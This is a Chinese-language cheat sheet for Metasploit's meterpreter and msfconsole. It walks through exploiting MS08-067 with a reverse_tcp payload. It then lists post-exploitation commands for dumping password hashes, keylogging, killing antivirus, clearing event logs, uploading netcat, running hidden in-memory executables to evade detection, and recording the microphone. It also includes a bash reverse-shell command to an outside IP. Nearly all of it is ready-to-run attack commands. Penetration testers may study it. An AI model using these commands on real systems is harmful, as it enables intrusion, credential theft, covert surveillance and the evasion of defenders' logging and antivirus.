meterpreter基本命令、Msfcli

meterpreter是更高级的payload。

纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。

基本命令

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set rhost 192.168.80.148

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set lhost 192.168.80.163

msf exploit(ms08_067_netapi) > exploit -j


msf exploit(ms08_067_netapi) > sessions -i 1  进入meterpreter类型的shell

meterpreter > background  退出到msf命令提示符下

meterpreter > lpwd  等价于在kali上输入pwd

meterpreter > lcd /etc  等价于在kali上输入cd /etc

meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

meterpreter > run post/windows/capture/keylog_recorder  键盘记录

meterpreter > run killav  结束目标主机上的杀毒软件相关进程

meterpreter > clearev  清除系统日志

meterpreter > download boot.ini  下载目标主机上的boot.ini文件

meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传nc.exe到目标主机上。(注意要使用2个反斜杠)

meterpreter > dir windows\\system32\\nc.exe

meterpreter > execute -f nc -nvlp 3333  执行nc.exe

meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

meterpreter > execute -f bash -i -H

meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

meterpreter > cat foo.txt 

-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

meterpreter > getuid  查看当前用户

meterpreter > getsystem  提权到system用户

meterpreter > getprivs  查看当前用户具有的权限

meterpreter > getpid  查看meterpreter注入到了什么进程中

meterpreter > migrate 1436   更改到pid1436进程中

meterpreter > getpid  重新使用getpid命令查看

meterpreter > hashdump  获取目标主机上用户的hash值

meterpreter > sysinfo  查看目标系统的信息

meterpreter > kill 188  结束188进程

meterpreter > shell  获取目标操作系统的shell

meterpreter > idletime  查看目标主机已经空闲了多长时间

meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

meterpreter > load python  加载python插件

Msfcli

Msfcli编写脚本时便于引用,一条语句获得自己需要的操作。2015年6月已经取消,被msfconsole -x取代。

msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set RHOST 192.168.80.148;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST 192.168.80.163;exploit"

你可能感兴趣的:(meterpreter基本命令、Msfcli)